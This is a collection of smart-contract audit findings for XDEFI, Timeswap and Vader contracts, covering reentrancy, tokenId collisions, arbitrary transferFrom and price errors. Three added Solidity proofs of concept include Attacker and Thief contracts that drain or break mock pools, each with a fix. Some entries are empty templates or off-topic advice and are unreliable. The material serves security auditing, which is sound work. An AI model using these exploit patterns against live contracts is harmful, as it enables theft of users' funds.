DOS pay function
Handle egjlmn1 Vulnerability details In the pay function users repay their debt, and in line 364 it decreases their debt. Let's say a user wants to repay all his debt; he calls the pay function with his full debt. An attacker can see it and frontrun to repay a single token for his debt since it's...
_generateNewTokenId can create collisions
Handle sirhashalot Vulnerability details Impact The ERC721 standard requires that "for any ERC-721 Contract, the pair (contract address, uint256 tokenId) must be globally unique" quoted from . However, the _generateNewTokenId function can produce tokenId values that are not globally unique. This wou...
Malicious early user/attacker can malfunction the contract and even freeze users' funds in edge cases
Handle WatchPug Vulnerability details pointsPerUnit += newXDEFI * pointsMultiplier / totalUnitsCached; In the current implementation, pointsPerUnit can be changed in updateDistribution, which can be called by anyone. A malicious early user can lock with only 1 wei of XDEFI and make pointsPerUnit to...
It's possible to have different bonusMultiplier for the same lock duration
Handle hubble Vulnerability details Impact The owner has the privilege to change the bonusMultiplier for a duration at any time, using the setLockPeriods function. So it's possible to have different bonusMultiplier values for different users for the same lock duration, which may not be desirable from the protocol...
merge() can cause lock to fail due to tokenId collision
Handle WatchPug Vulnerability details function _generateNewTokenId(uint256 points) internal view returns (uint256 tokenId) { // Points is capped at 128 bits (max supply of XDEFI for 10 years locked), total supply of NFTs is capped at 128 bits. return points ... PoC 1. Alice locks 1 XDEFI for 7 days 3 times, got...
NFT is not burned during unlock
Handle sirhashalot Vulnerability details Impact When the lock function is called, an ERC721 token is minted. The unlock function should perform the opposite operation as lock and burn the corresponding NFT. The unlock function modifies the positionOf mapping, but does NOT call the burn function t...
setLockPeriods accepts multipliers less than 100 (1x mult)
Handle StErMi Vulnerability details Impact In setLockPeriods you are not making any checks on the multiplier value for a given index. It means that the multiplier could be less than 100 (1x). Proof of Concept Tools Used Manual Recommended Mitigation Steps If you don't want to enable multiplier...
lockWithPermit() function allows for replay attacks and signature malleability
Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the lockWithPermit function calls permit on the XDEFI token. The problem with simply using permit alone for this is the message that is signed by the owner using the ECDSA algorithm. The message only contains the receiver...
No guard against zero address can possibly break functions with onlyOwner modifier
Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the proposeOwnership function should check that the newOwner arg is not a zero address because one error can break every function in the contract that uses the onlyOwner modifier because if the owner is set to the zero address...
MATIC/AVAX and AVAX/MATIC pools
Handle 0x0x0x Vulnerability details The MATIC/AVAX and AVAX/MATIC pools are close to being undercollateralized. Don't fall for the high APR psyops; always check the collateralization before lending into a pool, otherwise borrowers will default and you will lose your asset
Reentrancy allows attacker to lock the funds deposited in the contract
Handle tqts Vulnerability details Impact It is possible for attackers to exploit a reentrancy issue in lock(uint256,uint256,address) that would allow them to lock all funds deposited prior to the attack. Proof of Concept The problem lies in the lock(uint256,uint256,address) function, that transfers t...
XSS in uri token
Handle 0x1f8b Vulnerability details Impact An XSS could be produced. Proof of Concept The tokenURI method could be used with an arbitrary IPair; if this pair is composed with a specific symbol, a URI with XSS inside the SVG file could be produced, which will result in a stored XSS. Reference:...
no check that proposed owner is not the contract itself
Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the proposeOwnership function sets a pending owner but does not check to make sure that the newOwner is not the contract itself. This check is important to not risk setting the owner to an address that cannot be changed...
Iterating over large count numbers can cause out of gas errors
Handle jayjonah8 Vulnerability details Impact In XDEFIDistributionHelper.sol the getAllTokensForAccount function iterates over the count and performs actions on each iteration. Iterating over large arrays can cause out of gas failures and so the count number should be checked or limited to a max...
Missing nonReentrant modifier on merge() and updateDistribution(), can reenter from _lock()
Handle Fitraldys Vulnerability details Impact A user can call lock, which will call _lock, which eventually calls _safeMint; the _safeMint function makes an external call to the destination address through _checkOnERC721Received, and since merge and updateDistribution don't have nonReentrant...
23
Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps
vulnerability
Handle 0v3rf10w Vulnerability details In technical terms, Timeswap is an automated protocol based on the use of liquidity pools and implemented on the Ethereum blockchain. Users create liquidity pools with the participation of smart contracts. One pool is one marketplace providing exchange in a...
Anyone can steal XDEFI from the XDEFIDistribution contract and make the contract insolvent
Handle onewayfunction Vulnerability details Impact Anyone can steal XDEFI from the XDEFIDistribution contract, thereby making the contract insolvent. In the process, they also make the updateDistribution function uncallable -- and thus make the value of pointsPerUnit unchangeable. This comes with...
More than one historical lock-position may be represented by a single tokenId
Handle onewayfunction Vulnerability details Impact More than one historical lock-position may be represented by a single tokenId, violating the "uniqueness" property claimed by the xdefi-distribution repo's README.md. Proof of Concept The README.md says: The NFT's score is embedded in the tokenId...
totalDepositedXDEFI variable can be made incorrect by an attacker sending tokens
Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol, calling the lock function eventually calls _lock, where the totalDepositedXDEFI amount is updated based on the amount argument passed in by the caller, since that amount is transferred from the sender into the contract. But the...
Missing burn function in _unlock function
Handle Tomio Vulnerability details Impact In XDEFIDistribution.sol, a user can lock XDEFI tokens and get an ERC721/NFT token through the _safeMint function; however, when the user calls unlock, this contract deletes the position of this user but doesn't call the burn function in ERC721...
users might pay enormous amounts of gas
Handle danb Vulnerability details When a user mints new liquidity, if the pair doesn't already exist, it deploys it. Deploying a new contract on Ethereum is super expensive, especially when it's such a large contract as TimeswapPair; it can cost thousands of dollars. Impact Users who try to mint...
merge is loss of all assets
Handle danb Vulnerability details The merge function mints an NFT but doesn't add it to positionOf, which makes it worthless; in addition it burns all the NFTs of the user, which means they lose all assets.
DOS - preventing users from locking assets
Handle egjlmn1 Vulnerability details An attacker can prevent any user from locking assets due to the unsafe id generation for the NFTs. The id is generated using only the amount deposited, the duration to lock and the totalSupply of NFTs. The first two are easy for the attacker to copy, so al...
Dashboard is not working, lend positions are still loading, the same for the Lend button, Lend Amount to lend is not refreshing
Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps
Non-unique token ID might lead to collision when merging
Handle kenzo Vulnerability details Token IDs are defined as the concatenation of points and total supply + 1. The total supply can decrease when merging. This means that the contract might try to mint a token with an ID which already exists. Impact Under specific circumstances, users won't be able to lo...
Important state updates are made after the callback in the mint() function
Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the mint function has a callback in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function reentrancy. Since...
100
Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps
The reentrancy vulnerability in _safeMint can allow an attacker to steal all rewards
Handle cccz Vulnerability details Impact There is a reentrancy vulnerability in the _safeMint function: function _safeMint(address to, uint256 tokenId, bytes memory data) internal virtual { _mint(to, tokenId); require(_checkOnERC721Received(address(0), to, tokenId, data), "ERC721: transfer to non ERC721Receive...
pay() function has callback to msg.sender before important state updates
Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the pay function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function...
Incorrect fund distribution - updateDistribution not called in lock/unlock
Handle csanuragjain Vulnerability details Impact Users will get a smaller withdraw amount than they are entitled to. This happens since updateDistribution is not called in the locking and unlocking functions. Due to this, pointsPerUnit does not get updated and hence an incorrect withdraw amount gets calculated...
no reentrancy guard on mint() function that has a callback
Handle jayjonah8 Vulnerability details Impact In CollateralizedDebt.sol, the mint function calls _safeMint, which has a callback to the "to" address argument. Functions with callbacks should have reentrancy guards in place for protection against possible malicious actors both from inside and outsid...
In the lend() function state updates are made after the callback
Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the lend function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function...
_safeMint Will Fail Due To An Edge Case In Calculating tokenId Using The _generateNewTokenId Function
Handle leastwood Vulnerability details Impact NFTs are used to represent unique positions referenced by the generated tokenId. The tokenId value contains the position's score in the upper 128 bits and the index wrt. the token supply in the lower 128 bits. When positions are unlocked after expirin...
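The id-reuse path that the sirhashalot, WatchPug, onewayfunction, egjlmn1, kenzo and leastwood entries above describe (a tokenId that packs points in the upper 128 bits and totalSupply + 1 in the lower 128 bits, a merge that lowers totalSupply, and the resulting "already minted" revert on the next lock), as an added example that is not the project's code. The PositionBase skeleton, passing points straight into lock, the point value 7 and the Demo harness are constructed for illustration; the fix shown, a counter that only increases, is one possible mitigation and not necessarily the one the project adopted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed model, not the audited contract: only the id packing, the
// supply bookkeeping and the "already minted" check that produce the collision.
abstract contract PositionBase {
    mapping(uint256 => address) public ownerOf;
    uint256 public totalSupply;   // goes down on burn, which is exactly what the bug needs

    function _generateNewTokenId(uint256 points) internal virtual returns (uint256);

    // `points` is passed in directly; the real contract derives it from amount and duration.
    function lock(uint256 points) external returns (uint256 id) {
        id = _generateNewTokenId(points);
        _mint(msg.sender, id);
    }

    // Burns every input position (supply shrinks) and mints one with the summed points.
    function merge(uint256[] calldata ids) external returns (uint256 id) {
        uint256 points;
        for (uint256 i = 0; i < ids.length; i++) {
            require(ownerOf[ids[i]] == msg.sender, "not owner");
            points += ids[i] >> 128;
            _burn(ids[i]);
        }
        id = _generateNewTokenId(points);
        _mint(msg.sender, id);
    }

    function _mint(address to, uint256 id) internal {
        require(ownerOf[id] == address(0), "ERC721: token already minted");
        ownerOf[id] = to;
        totalSupply += 1;
    }

    function _burn(uint256 id) internal {
        delete ownerOf[id];
        totalSupply -= 1;
    }
}

// Vulnerable: the low 128 bits are totalSupply + 1, which repeats once a merge has
// pushed totalSupply below an index that is still in use.
contract VulnerablePositions is PositionBase {
    function _generateNewTokenId(uint256 points) internal view override returns (uint256) {
        return (points << 128) + totalSupply + 1;
    }
}

// Fixed: the low 128 bits come from a counter that only ever increases, so no
// (points, index) pair is handed out twice regardless of burns.
contract FixedPositions is PositionBase {
    uint256 private _nextIndex;

    function _generateNewTokenId(uint256 points) internal override returns (uint256) {
        require(points < (1 << 128), "points exceed 128 bits");
        return (points << 128) + (++_nextIndex);
    }
}

// Replays the PoC: three locks with equal points, merge two of them, lock again.
contract Demo {
    uint256 constant P = 7;   // any score; equal points on every lock is what makes ids clash

    function run(PositionBase positions) internal returns (bool lockReverted) {
        uint256[] memory ids = new uint256[](2);
        ids[0] = positions.lock(P);   // vulnerable: (P << 128) + 1
        ids[1] = positions.lock(P);   // vulnerable: (P << 128) + 2
        positions.lock(P);            // vulnerable: (P << 128) + 3, totalSupply == 3
        positions.merge(ids);         // burns the first two, mints (2P << 128) + 2, totalSupply == 2
        try positions.lock(P) {       // vulnerable: wants (P << 128) + 3 again -> "already minted"
            lockReverted = false;
        } catch {
            lockReverted = true;
        }
    }

    function vulnerableLockFails() external returns (bool) { return run(new VulnerablePositions()); }
    function fixedLockSucceeds() external returns (bool) { return !run(new FixedPositions()); }
}
```

Deploy Demo and call vulnerableLockFails() and fixedLockSucceeds(); both return true. The walkthrough in the comments is the kenzo/WatchPug scenario: the merge burns two positions, so totalSupply falls back to 2 while the position with index 3 still exists, and the next lock with the same points collides with it. A counter that never decreases removes the dependency between burned positions and future ids; the extra range check keeps points from spilling into the index bits.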
_lock Performs An Improper Check When Enforcing The MAX_TOTAL_XDEFI_SUPPLY Constraint
Handle leastwood Vulnerability details Impact The _lock function intends to lock users' XDEFI tokens for a predetermined duration. The contract contains a MAX_TOTAL_XDEFI_SUPPLY constraint which aims to prevent total deposits from exceeding this amount. However, _lock does not check this correctly and...
Reentrancy at lock can lead to wrong accounting
Handle kenzo Vulnerability details The _lock function calls _safeMint in the midst of it. This can lead to reentry into updateDistribution, thereby ruining contract invariants. Impact In the worst case, loss of user funds: distributableXDEFI will be set to be bigger than it really is, and so when a...
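The reentry that the tqts, Fitraldys, cccz and kenzo entries above describe, as an added example that is not the project's code: a lock that pulls tokens in and fires the ERC721 receiver callback before writing its accounting, an updateDistribution that treats every untracked token as rewards, and an attacker contract that re-enters from onERC721Received. The MockXDEFI token (no allowance check), the 1e18 points multiplier, the solvent() invariant and the Demo harness are constructed for illustration; the hardened lockFixed applies checks-effects-interactions plus a reentrancy guard, which is one way to close the path and not necessarily the project's fix.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

// Constructed model of the lock -> _safeMint -> updateDistribution reentry; not the audited code.
interface IERC721Receiver {
    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4);
}

contract MockXDEFI {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function transferFrom(address from, address to, uint256 amt) external returns (bool) {
        balanceOf[from] -= amt; balanceOf[to] += amt; return true;   // no allowance check: demo only
    }
}

contract Distribution {
    MockXDEFI public immutable xdefi;
    uint256 public totalDepositedXDEFI;   // principal owed back to lockers
    uint256 public distributableXDEFI;    // rewards already folded into pointsPerUnit
    uint256 public totalUnits;
    uint256 public pointsPerUnit;
    uint256 private _nextId;
    uint256 private _guard = 1;
    mapping(uint256 => address) public ownerOf;
    constructor(MockXDEFI token) { xdefi = token; }
    modifier nonReentrant() { require(_guard == 1, "reentrant"); _guard = 2; _; _guard = 1; }

    // Anyone may call. Whatever the contract holds beyond the two tracked totals is booked as
    // newly arrived rewards, which is only right if both totals are current at that moment.
    function updateDistribution() public {
        uint256 newXDEFI = xdefi.balanceOf(address(this)) - totalDepositedXDEFI - distributableXDEFI;
        if (newXDEFI == 0 || totalUnits == 0) return;
        distributableXDEFI += newXDEFI;
        pointsPerUnit += newXDEFI * 1e18 / totalUnits;
    }

    // Vulnerable: tokens are pulled in, then _safeMint hands control to `destination`
    // while totalDepositedXDEFI still excludes `amount`.
    function lock(uint256 amount, address destination) external returns (uint256 id) {
        xdefi.transferFrom(msg.sender, address(this), amount);
        id = ++_nextId;
        _safeMint(destination, id);
        totalDepositedXDEFI += amount;
        totalUnits += amount;
    }

    // Hardened: checks-effects-interactions, plus a guard so nested calls into any
    // guarded entry point revert outright.
    function lockFixed(uint256 amount, address destination) external nonReentrant returns (uint256 id) {
        xdefi.transferFrom(msg.sender, address(this), amount);
        totalDepositedXDEFI += amount;
        totalUnits += amount;
        id = ++_nextId;
        _safeMint(destination, id);
    }

    function _safeMint(address to, uint256 id) internal {
        ownerOf[id] = to;
        if (to.code.length > 0) {   // the same hook ERC721's _checkOnERC721Received uses
            bytes4 ret = IERC721Receiver(to).onERC721Received(msg.sender, address(0), id, "");
            require(ret == IERC721Receiver.onERC721Received.selector, "non ERC721Receiver");
        }
    }

    // Invariant withdrawals rely on; false once the attack has run.
    function solvent() external view returns (bool) {
        return xdefi.balanceOf(address(this)) >= totalDepositedXDEFI + distributableXDEFI;
    }
}

contract Attacker is IERC721Receiver {
    Distribution public immutable dist;
    constructor(Distribution d) { dist = d; }
    function attack(uint256 amount, bool useFixed) external {
        if (useFixed) dist.lockFixed(amount, address(this)); else dist.lock(amount, address(this));
    }

    // Runs inside _safeMint. During lock() the in-flight deposit is not yet in
    // totalDepositedXDEFI, so updateDistribution books it as rewards.
    function onERC721Received(address, address, uint256, bytes calldata) external override returns (bytes4) {
        dist.updateDistribution();
        return this.onERC721Received.selector;
    }
}

contract Demo {
    // Two deposits of 1e18; the first seeds totalUnits, the second's reentry does the damage.
    function run(bool useFixed) external returns (bool solventAfter) {
        MockXDEFI token = new MockXDEFI();
        Distribution dist = new Distribution(token);
        Attacker a = new Attacker(dist);
        token.mint(address(a), 2e18);
        a.attack(1e18, useFixed);
        a.attack(1e18, useFixed);
        solventAfter = dist.solvent();   // false for lock(), true for lockFixed()
    }
}
```

Demo.run(false) ends with distributableXDEFI == 1e18 and totalDepositedXDEFI == 2e18 against a balance of 2e18: the attacker's second deposit has been booked twice, once as rewards (credited to the attacker's own units during the callback) and once as principal, so later withdrawals cannot all be honoured. Demo.run(true) keeps the contract solvent because the callback finds balance == totalDepositedXDEFI + distributableXDEFI; adding nonReentrant to merge and updateDistribution as well, as the Fitraldys entry recommends, closes the same route from other callbacks.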
borrow() function has state updates after a callback to msg.sender
Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the borrow function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross functi...
Price Calculation Favours Higher Priced Token Pairs
Handle leastwood Vulnerability details Impact calculateVaderPrice and calculateUSDVPrice are used indirectly by USDV.sol to calculate the mint and burn amounts for the respective actions. totalUSD and totalVader/totalUSDV are calculated by iterating through each token pair, where the ratio betwee...
Covering impermanent loss allows profiting from asymmetric liquidity provision at the expense of reserves
Handle hyh Vulnerability details Impact Pool funds will be siphoned out over time, as swaps and asymmetric LP provision generally balance each other economically, while with the introduction of IL reimbursement a malicious user can make an asymmetric LP, then profit immediately from out-of-balan...
USDV.sol Mint and Burn Amounts Are Incorrect
Handle leastwood Vulnerability details Impact The USDV.mint function queries the price of Vader from the LiquidityBasedTwap contract. The calculation to determine uAmount in mint is actually performed incorrectly. uAmount = vPrice * vAmount / 1e18; will return the USD amount for the provided Vader ...
mintSynth() can transfer funds from an arbitrary address
Handle Critical Vulnerability details Impact Attackers can steal funds from the balances of users who approved the VaderPoolV2 contract. Proof of Concept nativeAsset.safeTransferFrom(from, address(this), nativeDeposit); VaderPoolV2.mintSynth allows anyone to transfer funds from an arbitrary addre...
Using single total native reserve variable for synth and non-synth reserves of VaderPoolV2 can lead to losses for synth holders
Handle hyh Vulnerability details Impact Users that mint synths do provide native assets, increasing the native reserve pool, but do not get any liquidity shares issued. At the same time, an exit of a non-synth liquidity provider releases a proportion of all current reserves to him. Whenever an...
Slippage control
Handle pauliax Vulnerability details Impact The mint and burn functions of USDV should allow the user to specify min amounts to receive. This would help the user avoid huge slippage. Another reason is that the price is fetched from lbt, but this address can be changed anytime (function setLBTwap), so i...
Adding pair of the same foreignAsset would replace oracle of earlier entry
Handle gzeon Vulnerability details Impact Oracles are mapped to the foreignAsset but not to the specific pair. Pairs with the same foreignAsset e.g. UniswapV2 and Sushi will be forced to use the same oracle. Generally this should be the expected behavior but there are also possibility that while...
VaderPoolV2 minting synths & fungibles can be frontrun
Handle cmichel Vulnerability details The VaderPoolV2 mintFungible and mintSynth functions perform an unsafe nativeAsset.safeTransferFrom(from, address(this), nativeDeposit) with a parameter-specified from address. Note that these functions are not called by the Router, they are directly called on the...
Vader TWAP averages wrong
Handle cmichel Vulnerability details The vader price in LiquidityBasedTWAP.getVaderPrice is computed using the pastLiquidityWeights and pastTotalLiquidityWeight return values of the syncVaderPrice. The syncVaderPrice function does not initialize all weights and the total liquidity weight does not...
USDV TWAP averages wrong
Handle cmichel Vulnerability details The vader price in LiquidityBasedTWAP.getUSDVPrice is computed using the pastLiquidityWeights and pastTotalLiquidityWeight return values of the syncUSDVPrice. The syncUSDVPrice function does not initialize all weights and the total liquidity weight does not...
totalLiquidityWeight Is Updated When Adding New Token Pairs Which Skews Price Data For getVaderPrice and getUSDVPrice
Handle leastwood Vulnerability details Impact The addVaderPair function is called by the onlyOwner role. The relevant data in the twapData mapping is set by querying the respective liquidity pool and Chainlink oracle. totalLiquidityWeight for the VADER path is also incremented by the...
vader price is wrong
Handle danb Vulnerability details For tokens that are not updated in syncVaderPrice because their updatePeriod is greater than timeElapsed, their liquidity weight will be zero; this will make the vader price wrong when calling getVaderPrice and it can be exploited. Recommended Mitigation Steps move...
Anyone Can Frontrun VaderPoolV2.mintSynth() To Steal Synthetic Assets
Handle leastwood Vulnerability details Impact The mintSynth function is callable by any user and creates a synthetic asset against foreignAsset if it does not already exist. The protocol expects a user to first approve the contract as a spender before calling mintSynth. However, any arbitrary use...
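The caller-controlled `from` that the Critical, cmichel and leastwood mintSynth entries above describe, as an added example that is not the Vader code: a pool whose mint function forwards a user-supplied `from` to transferFrom, beside a version that can only spend msg.sender's own allowance. The MockToken, the 1:1 synth credit (real synth pricing is pool math and is left out), and the Thief and Demo contracts are constructed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Constructed model of the caller-controlled `from` in mintSynth; not the audited code.
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

contract MockToken is IERC20 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function approve(address spender, uint256 amt) external { allowance[msg.sender][spender] = amt; }
    function transferFrom(address from, address to, uint256 amt) external override returns (bool) {
        allowance[from][msg.sender] -= amt;   // 0.8 checked math: reverts without allowance
        balanceOf[from] -= amt;
        balanceOf[to] += amt;
        return true;
    }
}

contract SynthPool {
    IERC20 public immutable nativeAsset;
    mapping(address => uint256) public synthBalance;   // 1:1 synth credit, stands in for pool math

    constructor(IERC20 asset) { nativeAsset = asset; }

    // Vulnerable: `from` is whatever the caller says. Anyone who has approved this pool
    // (for example ahead of an honest mint) can be drained, and the synth goes to the caller's `to`.
    function mintSynth(address from, address to, uint256 nativeDeposit) external returns (uint256) {
        nativeAsset.transferFrom(from, address(this), nativeDeposit);
        synthBalance[to] += nativeDeposit;
        return nativeDeposit;
    }

    // Hardened: only msg.sender's own allowance can be spent. If a router must act for
    // users, restrict the caller to the router and have the router pass its own msg.sender.
    function mintSynthFixed(address to, uint256 nativeDeposit) external returns (uint256) {
        nativeAsset.transferFrom(msg.sender, address(this), nativeDeposit);
        synthBalance[to] += nativeDeposit;
        return nativeDeposit;
    }
}

contract Thief {
    // Front-runs a victim that has already approved the pool.
    function drain(SynthPool pool, address victim, uint256 amt) external returns (bool ok) {
        try pool.mintSynth(victim, address(this), amt) { ok = true; } catch { ok = false; }
    }
    // No `from` left to abuse: the thief can only spend its own (zero) allowance and reverts.
    function drainFixed(SynthPool pool, uint256 amt) external returns (bool ok) {
        try pool.mintSynthFixed(address(this), amt) { ok = true; } catch { ok = false; }
    }
}

// Demo plays the victim: it approves the pool, as a user would before minting, and a
// third party spends that approval first.
contract Demo {
    function run() external returns (bool fixedDrained, bool vulnerableDrained, uint256 thiefSynth) {
        MockToken token = new MockToken();
        SynthPool pool = new SynthPool(token);
        Thief thief = new Thief();
        token.mint(address(this), 1e18);
        token.approve(address(pool), 1e18);
        fixedDrained = thief.drainFixed(pool, 1e18);               // false: call reverts
        vulnerableDrained = thief.drain(pool, address(this), 1e18); // true: victim's 1e18 is gone
        thiefSynth = pool.synthBalance(address(thief));            // 1e18 credited to the thief
    }
}
```

Demo.run() returns (false, true, 1e18): the approval the victim granted for its own mint is enough for anyone to move the tokens and claim the synth, which is the frontrun the cmichel and leastwood entries describe. The fix removes the parameter rather than validating it; an allowance is a grant to the pool, not to whoever calls the pool, so the pool must only ever pull from the account that is calling it (or from an account a trusted router vouches for).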